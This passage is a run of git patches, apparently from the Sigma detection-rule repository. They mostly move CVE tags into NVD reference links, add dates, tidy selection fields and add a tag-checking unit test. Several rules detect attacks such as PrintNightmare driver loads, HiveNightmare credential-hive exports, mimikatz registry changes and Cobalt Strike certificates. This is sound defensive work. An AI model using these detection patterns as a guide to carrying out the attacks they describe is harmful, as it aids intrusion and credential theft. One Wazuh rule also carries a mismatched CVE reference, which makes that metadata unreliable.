d8befe3a13f29b100b78c5f9534b769124a5c3d2 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 07:34:33 +0200 Subject: [PATCH 0549/1367] Update References --- rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml index 8857a874..e1602e38 100644 --- a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml +++ b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml @@ -6,7 +6,7 @@ status: experimental date: 2021/08/23 references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#AUTHORIZE_API_CLIENT_ACCESS + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS logsource: service: google_workspace.admin detection: From be43ecd70db63098b7209f2e596ef68c4978ca74 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 07:57:16 +0200 Subject: [PATCH 0550/1367] Remove empty element in list Otherwise get a `null` when convert to some backend (es-rule,...) --- .../zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml index 390edb4d..e6e84085 100644 --- a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml +++ b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml @@ -13,7 +13,6 @@ references: - https://github.com/SigmaHQ/sigma/blob/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml - https://old.zeek.org/zeekweek2019/slides/bzar.pdf - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/ - - tags: - attack.execution - cve.2021-1675 @@ -42,4 +41,4 @@ fields: - endpoint - named_pipe - uid -status: stable \ No newline at end of file +status: stable From 8ab90d801293189a4486e2d8a397ffe1d9396db1 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 07:59:36 +0200 Subject: [PATCH 0551/1367] add modified --- rules/network/zeek/zeek_default_cobalt_strike_certificate.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml b/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml index 97460495..ed328eeb 100644 --- a/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml +++ b/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml @@ -2,7 +2,8 @@ title: Default Cobalt Strike Certificate id: 7100f7e3-92ce-4584-b7b7-01b40d3d4118 description: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic author: Bhabesh Raj -date: 2021/08/26 +date: 2021/06/23 +modified: 2021/08/24 references: - https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468 tags: From 4ee4f12f308f2da69cad4ab135f7ad9a433c86a0 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 08:01:01 +0200 Subject: [PATCH 0552/1367] add modified --- rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml b/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml index a8853b8e..c4ee427d 100644 --- a/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml +++ b/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml @@ -9,7 +9,8 @@ references: tags: - attack.lateral_movement - attack.t1021.002 -date: 2021/08/23 +date: 2018/11/28 +modified: 2021/08/23 logsource: product: zeek service: smb_files From 15aa0cb70ee920560b2476f049663053fc6be551 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 08:02:24 +0200 Subject: [PATCH 0553/1367] add modified --- rules/network/zeek/zeek_dns_mining_pools.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index 91d87824..c6d11204 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -4,6 +4,7 @@ description: Identifies clients that may be performing DNS lookups associated wi references: - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_Miners.yaml date: 2021/08/19 +modified: 2021/08/23 author: Saw Winn Naung, Azure-Sentinel, @neu5ron level: low logsource: From 272625a0052f6c0ecfa07b687a4452177bfa51f8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 24 Aug 2021 08:34:08 +0200 Subject: [PATCH 0554/1367] Update win_susp_splwow64.yml --- rules/windows/process_creation/win_susp_splwow64.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_splwow64.yml b/rules/windows/process_creation/win_susp_splwow64.yml index 3695fcec..38c4a4da 100644 --- a/rules/windows/process_creation/win_susp_splwow64.yml +++ b/rules/windows/process_creation/win_susp_splwow64.yml @@ -13,7 +13,7 @@ detection: selection: Image|endswith: '\splwow64.exe' filter: - CommandLine|contains: 'splwow64.exe ' + CommandLine|endswith: 'splwow64.exe' condition: selection and not filter falsepositives: - Unknown From 8f85ac0fdefa0966399c9f71b0f7116851a644a1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 24 Aug 2021 09:35:04 +0200 Subject: [PATCH 0555/1367] tags update --- rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml | 2 +- rules/web/web_cve_2018_2894_weblogic_exploit.yml | 2 +- rules/web/web_cve_2020_3452_cisco_asa_ftd.yml | 2 +- rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml | 2 +- rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml index e1602e38..0b09904b 100644 --- a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml +++ b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml @@ -17,7 +17,7 @@ detection: level: medium tags: - attack.persistence - - atack.t1098 + - attack.t1098 falsepositives: - Unknown diff --git a/rules/web/web_cve_2018_2894_weblogic_exploit.yml b/rules/web/web_cve_2018_2894_weblogic_exploit.yml index cb39d1fb..b2fcd3e7 100644 --- a/rules/web/web_cve_2018_2894_weblogic_exploit.yml +++ b/rules/web/web_cve_2018_2894_weblogic_exploit.yml @@ -9,6 +9,7 @@ references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894 - https://twitter.com/pyn3rd/status/1020620932967223296 - https://github.com/LandGrey/CVE-2018-2894 + - https://nvd.nist.gov/vuln/detail/cve-2018-2894 logsource: category: webserver detection: @@ -26,5 +27,4 @@ tags: - attack.t1190 - attack.initial_access - attack.persistence - - cve.2018-2894 - attack.t1505.003 diff --git a/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml b/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml index 8fb1ae92..f7ac95eb 100644 --- a/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml +++ b/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml @@ -8,6 +8,7 @@ references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452 - https://twitter.com/aboul3la/status/1286012324722155525 - https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter + - https://nvd.nist.gov/vuln/detail/CVE-2020-3452 logsource: category: webserver detection: @@ -34,4 +35,3 @@ tags: - attack.t1100 # an old one - attack.t1190 - attack.initial_access - - cve.2020-3452 diff --git a/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml b/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml index 476408c2..df17a5de 100644 --- a/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml +++ b/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml @@ -7,6 +7,7 @@ date: 2021/01/20 references: - https://twitter.com/pyn3rd/status/1351696768065409026 - https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw + - https://nvd.nist.gov/vuln/detail/cve-2021-2109 logsource: category: webserver detection: @@ -26,4 +27,3 @@ level: critical tags: - attack.t1190 - attack.initial_access - - cve.2021-2109 diff --git a/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml b/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml index 8a240ab4..9da58de5 100644 --- a/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml +++ b/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml @@ -8,6 +8,7 @@ references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21978 - https://twitter.com/wugeej/status/1369476795255320580 - https://paper.seebug.org/1495/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-21978 logsource: category: webserver detection: @@ -27,4 +28,3 @@ level: high tags: - attack.initial_access - attack.t1190 - - cve.2021-21978 \ No newline at end of file From c2302a15dadc1063687846c8aaa1026633a4e778 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 24 Aug 2021 10:10:45 +0200 Subject: [PATCH 0556/1367] fix cve tags --- .../web_cve_2020_14882_weblogic_exploit.yml | 2 +- rules/web/web_cve_2021_26814_wzuh_rce.yml | 2 +- ...terramaster_cve_2020_28188_rce_exploit.yml | 2 +- ...cve_2021_31979_cve_2021_33771_exploits.yml | 4 ++-- tests/test_rules.py | 21 +++++++++++++++++++ 5 files changed, 26 insertions(+), 5 deletions(-) diff --git a/rules/web/web_cve_2020_14882_weblogic_exploit.yml b/rules/web/web_cve_2020_14882_weblogic_exploit.yml index 14afc0d1..cb3545ad 100644 --- a/rules/web/web_cve_2020_14882_weblogic_exploit.yml +++ b/rules/web/web_cve_2020_14882_weblogic_exploit.yml @@ -10,6 +10,7 @@ references: - https://isc.sans.edu/diary/26734 - https://twitter.com/jas502n/status/1321416053050667009?s=20 - https://twitter.com/sudo_sudoka/status/1323951871078223874 + - https://nvd.nist.gov/vuln/detail/cve-2020-14882 logsource: category: webserver detection: @@ -28,4 +29,3 @@ tags: - attack.t1100 # an old one - attack.t1190 - attack.initial_access - - cve.2020-14882 diff --git a/rules/web/web_cve_2021_26814_wzuh_rce.yml b/rules/web/web_cve_2021_26814_wzuh_rce.yml index 672226f4..03012d37 100644 --- a/rules/web/web_cve_2021_26814_wzuh_rce.yml +++ b/rules/web/web_cve_2021_26814_wzuh_rce.yml @@ -7,6 +7,7 @@ date: 2021/05/22 references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-26814 - https://github.com/WickdDavid/CVE-2021-26814/blob/main/PoC.py + - https://nvd.nist.gov/vuln/detail/cve-2021-21978 logsource: category: webserver detection: @@ -22,4 +23,3 @@ level: high tags: - attack.initial_access - attack.t1190 - - cve.2021-21978 \ No newline at end of file diff --git a/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml b/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml index 931e2389..73316e52 100644 --- a/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml +++ b/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml @@ -8,6 +8,7 @@ references: - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2020-28188 - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ + - https://nvd.nist.gov/vuln/detail/cve-2020-28188 logsource: category: webserver detection: @@ -34,4 +35,3 @@ level: critical tags: - attack.t1190 - attack.initial_access - - cve.2020-28188 diff --git a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml index f2ec067c..d0117429 100644 --- a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml @@ -9,12 +9,12 @@ modified: 2021/08/06 references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ + - https://nvd.nist.gov/vuln/detail/cve-2021-33771 + - https://nvd.nist.gov/vuln/detail/cve-2021-31979 tags: - attack.credential_access - attack.t1566 - attack.t1203 - - cve.2021-33771 - - cve.2021-31979 - threat_group.Sourgum falsepositives: - Unlikely diff --git a/tests/test_rules.py b/tests/test_rules.py index d34bd849..eefaad4a 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -72,6 +72,27 @@ class TestRules(unittest.TestCase): self.assertEqual(files_with_legal_issues, [], Fore.RED + "There are rule files which contains a trademark or reference that doesn't comply with the respective trademark requirements - please remove the trademark to avoid legal issues") + + def test_optional_tags(self): + files_with_incorrect_tags = [] + + for file in self.yield_next_rule_file_path(self.path_to_rules): + tags = self.get_rule_part(file_path=file, part_name="tags") + if tags: + for tag in tags: + if tag.startswith("attack."): + continue + elif tag.startswith("car."): + continue + elif tag.startswith("cve."): + print(Fore.RED + "Rule {} has the cve tag <{}> but is it a references (https://nvd.nist.gov/)".format(file, tag)) + # files_with_incorrect_tags.append(file) + else: + print(Fore.RED + "Rule {} has the unknown tag <{}>".format(file, tag)) + # files_with_incorrect_tags.append(file) + + self.assertEqual(files_with_incorrect_tags, [], Fore.RED + + "There are rules with incorrect/unknown MITRE Tags. (please inform us about new tags that are not yet supported in our tests) and check the correct tags here: https://attack.mitre.org/ ") def test_confirm_correct_mitre_tags(self): files_with_incorrect_mitre_tags = [] From ace46c17bee09d8d331dcd22d5551b2516d26773 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 24 Aug 2021 10:27:27 +0200 Subject: [PATCH 0557/1367] Update cve tags --- .../win_exploit_cve_2021_1675_printspooler.yml | 2 +- ...xploit_cve_2021_1675_printspooler_Security.yml | 4 ++-- ...oit_cve_2021_1675_printspooler_operational.yml | 2 +- .../driver_load/sysmon_vuln_dell_driver_load.yml | 3 ++- .../win_cve_2021_1675_printspooler_del.yml | 11 +++++------ .../image_load/sysmon_spoolsv_dll_load.yml | 15 ++++++--------- .../win_susp_servu_process_pattern.yml | 3 ++- 7 files changed, 19 insertions(+), 21 deletions(-) diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml index 62e12357..26866f88 100644 --- a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml @@ -8,11 +8,11 @@ references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare - https://twitter.com/fuzzyf10w/status/1410202370835898371 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 date: 2021/06/30 modified: 2021/07/08 tags: - attack.execution - - cve.2021-1675 logsource: product: windows service: printservice-admin diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_Security.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_Security.yml index ce921b98..d36b0ea4 100644 --- a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_Security.yml +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_Security.yml @@ -6,11 +6,11 @@ status: experimental level: critical references: - https://twitter.com/INIT_3/status/1410662463641731075 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-34527 date: 2021/07/02 tags: - attack.execution - - cve.2021-1675 - - cve.2021-34527 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml index 9b2fa174..4fbbee51 100644 --- a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml @@ -6,10 +6,10 @@ status: experimental level: critical references: - https://twitter.com/MalwareJake/status/1410421967463731200 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 date: 2021/07/01 tags: - attack.execution - - cve.2021-1675 logsource: product: windows service: printservice-operational diff --git a/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml b/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml index 21868b8a..ea92afb4 100644 --- a/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml +++ b/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml @@ -5,11 +5,12 @@ author: Florian Roth date: 2021/05/05 references: - https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/ + - https://nvd.nist.gov/vuln/detail/cve-2021-21551 logsource: category: driver_load product: windows tags: - - cve.2021-21551 + - attack.privilege_escalation detection: selection_image: ImageLoaded|contains: '\DBUtil_2_3.Sys' diff --git a/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml b/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml index 1b97f004..397a66b1 100644 --- a/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml +++ b/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml @@ -5,24 +5,23 @@ description: Detect DLL deletions from Spooler Service driver folder references: - https://github.com/hhlxf/PrintNightmare - https://github.com/cube0x0/CVE-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 author: Bhabesh Raj date: 2021/07/01 +modified: 2021/08/24 tags: - attack.persistence - attack.defense_evasion - attack.privilege_escalation - attack.t1574 - - cve.2021-1675 logsource: category: file_delete product: windows detection: selection: - Image|endswith: - - 'spoolsv.exe' - TargetFilename|contains: - - 'C:\Windows\System32\spool\drivers\x64\3\' + Image|endswith: 'spoolsv.exe' + TargetFilename|contains: 'C:\Windows\System32\spool\drivers\x64\3\' condition: selection falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/windows/image_load/sysmon_spoolsv_dll_load.yml b/rules/windows/image_load/sysmon_spoolsv_dll_load.yml index e51c20cd..38e94f80 100644 --- a/rules/windows/image_load/sysmon_spoolsv_dll_load.yml +++ b/rules/windows/image_load/sysmon_spoolsv_dll_load.yml @@ -4,27 +4,24 @@ status: experimental description: Detect DLL Load from Spooler Service backup folder references: - https://github.com/hhlxf/PrintNightmare + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-34527 author: FPT.EagleEye, Thomas Patzke (improvements) date: 2021/06/29 -modified: 2021/07/08 +modified: 2021/08/24 tags: - attack.persistence - attack.defense_evasion - attack.privilege_escalation - attack.t1574 - - cve.2021-1675 - - cve.2021-34527 logsource: category: image_load product: windows detection: selection: - Image|endswith: - - 'spoolsv.exe' - ImageLoaded|contains: - - '\Windows\System32\spool\drivers\x64\3\' - ImageLoaded|endswith: - - '.dll' + Image|endswith: 'spoolsv.exe' + ImageLoaded|contains: '\Windows\System32\spool\drivers\x64\3\' + ImageLoaded|endswith: '.dll' condition: selection falsepositives: - Loading of legitimate driver diff --git a/rules/windows/process_creation/win_susp_servu_process_pattern.yml b/rules/windows/process_creation/win_susp_servu_process_pattern.yml index 097a6ae6..90b50893 100644 --- a/rules/windows/process_creation/win_susp_servu_process_pattern.yml +++ b/rules/windows/process_creation/win_susp_servu_process_pattern.yml @@ -6,11 +6,12 @@ author: Florian Roth date: 2021/07/14 references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ + - https://nvd.nist.gov/vuln/detail/cve-2021-35211 logsource: category: process_creation product: windows tags: - - cve.2021-35211 + - attack.credential_access detection: selection: ParentImage|endswith: '\Serv-U.exe' From 5b869a3f427e5a7931d047f5ef4e2eedbf712305 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 24 Aug 2021 10:50:01 +0200 Subject: [PATCH 0558/1367] Update cve tags --- .../lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml | 2 +- .../zeek_dce_rpc_printnightmare_print_driver_install.yml | 4 ++-- .../windows/file_event/sysmon_cve_2021_26858_msexchange.yml | 2 +- rules/windows/file_event/win_cve_2021_1675_printspooler.yml | 3 ++- rules/windows/file_event/win_hivenightmare_file_exports.yml | 2 +- .../process_creation/sysmon_cve_2021_26857_msexchange.yml | 2 +- .../win_susp_servu_exploitation_cve_2021_35211.yml | 2 +- .../registry_event/sysmon_registry_susp_printer_driver.yml | 3 ++- .../win_registry_mimikatz_printernightmare.yml | 6 +++--- tests/test_rules.py | 2 +- 10 files changed, 15 insertions(+), 13 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml index e307a025..da9e53df 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml @@ -10,13 +10,13 @@ date: 2021/02/01 references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit + - https://nvd.nist.gov/vuln/detail/cve-2021-3156 falsepositives: - Unknown level: critical tags: - attack.privilege_escalation - attack.t1068 - - cve.2021-3156 logsource: product: linux service: auditd diff --git a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml index e6e84085..adf32660 100644 --- a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml +++ b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml @@ -13,10 +13,10 @@ references: - https://github.com/SigmaHQ/sigma/blob/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml - https://old.zeek.org/zeekweek2019/slides/bzar.pdf - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/ + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-1678 tags: - attack.execution - - cve.2021-1675 - - cve.2021-1678 logsource: product: zeek service: dce_rpc diff --git a/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml b/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml index 0b4ba06e..84390c48 100644 --- a/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml +++ b/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml @@ -9,11 +9,11 @@ level: critical references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26858 - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ + - https://nvd.nist.gov/vuln/detail/cve-2021-26858 date: 2021/03/03 tags: - attack.t1203 - attack.execution - - cve.2021-26858 logsource: category: file_event product: windows diff --git a/rules/windows/file_event/win_cve_2021_1675_printspooler.yml b/rules/windows/file_event/win_cve_2021_1675_printspooler.yml index 60ee7dca..9f426abd 100644 --- a/rules/windows/file_event/win_cve_2021_1675_printspooler.yml +++ b/rules/windows/file_event/win_cve_2021_1675_printspooler.yml @@ -8,11 +8,12 @@ references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare - https://github.com/cube0x0/CVE-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 date: 2021/06/29 modified: 2021/07/01 tags: - attack.execution - - cve.2021-1675 + - attack.privilege_escalation logsource: category: file_event product: windows diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index 47292ac6..ea5cc888 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -9,11 +9,11 @@ references: - https://github.com/FireFart/hivenightmare/ - https://github.com/WiredPulse/Invoke-HiveNightmare - https://twitter.com/cube0x0/status/1418920190759378944 + - https://nvd.nist.gov/vuln/detail/cve-2021-36934 logsource: product: windows category: file_event tags: - - cve.2021-36934 - attack.credential_access - attack.t1552.001 detection: diff --git a/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml b/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml index 42028896..b0102bf5 100644 --- a/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml +++ b/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml @@ -8,11 +8,11 @@ level: critical references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-26857 - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ + - https://nvd.nist.gov/vuln/detail/cve-2021-26857 date: 2021/03/03 tags: - attack.t1203 - attack.execution - - cve.2021-26857 logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml b/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml index 78f543ac..f6208a36 100644 --- a/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml +++ b/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml @@ -6,13 +6,13 @@ author: Florian Roth date: 2021/07/14 references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ + - https://nvd.nist.gov/vuln/detail/cve-2021-35211 logsource: category: process_creation product: windows tags: - attack.persistence - attack.t1136.001 - - cve.2021-35211 - threat_group.DEV-0322 detection: selection1: diff --git a/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml b/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml index 542bd527..ad3f790d 100644 --- a/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml +++ b/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml @@ -4,10 +4,11 @@ status: experimental description: Detects a suspicious printer driver installation with an empty Manufacturer value references: - https://twitter.com/SBousseaden/status/1410545674773467140 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 author: Florian Roth date: 2020/07/01 tags: - - cve.2021-1675 + - attack.privilege_escalation logsource: category: registry_event product: windows diff --git a/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml b/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml index 44c2e943..db8f4a1f 100644 --- a/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml +++ b/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml @@ -6,11 +6,11 @@ references: - https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760 - https://www.lexjansen.com/sesug/1993/SESUG93035.pdf - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-34527 author: Markus Neis, @markus_neis, Florian Roth tags: - attack.execution - - cve.2021-1675 - - cve.2021-34527 date: 2021/07/04 modified: 2021/07/28 logsource: @@ -37,4 +37,4 @@ detection: condition: selection or selection_alt or (selection_print and selection_kiwi) falsepositives: - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely) -level: critical \ No newline at end of file +level: critical diff --git a/tests/test_rules.py b/tests/test_rules.py index eefaad4a..f712875f 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -86,7 +86,7 @@ class TestRules(unittest.TestCase): continue elif tag.startswith("cve."): print(Fore.RED + "Rule {} has the cve tag <{}> but is it a references (https://nvd.nist.gov/)".format(file, tag)) - # files_with_incorrect_tags.append(file) + files_with_incorrect_tags.append(file) else: print(Fore.RED + "Rule {} has the unknown tag <{}>".format(file, tag)) # files_with_incorrect_tags.append(file) From 3cdb88ad55a206881b67ea604b4fc3f2113990da Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 24 Aug 2021 12:30:40 +0200 Subject: [PATCH 0559/1367] refactor: level of suspicious parent for powershell rule --- .../process_creation/win_susp_powershell_parent_process.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_powershell_parent_process.yml b/rules/windows/process_creation/win_susp_powershell_parent_process.yml index b58535be..70b6b93f 100644 --- a/rules/windows/process_creation/win_susp_powershell_parent_process.yml +++ b/rules/windows/process_creation/win_susp_powershell_parent_process.yml @@ -56,4 +56,4 @@ detection: condition: all of them falsepositives: - Other scripts -level: medium +level: high From 7753f8c22e1137315d26fdf22c247e3ef6c71f9e Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 24 Aug 2021 12:36:31 +0200 Subject: [PATCH 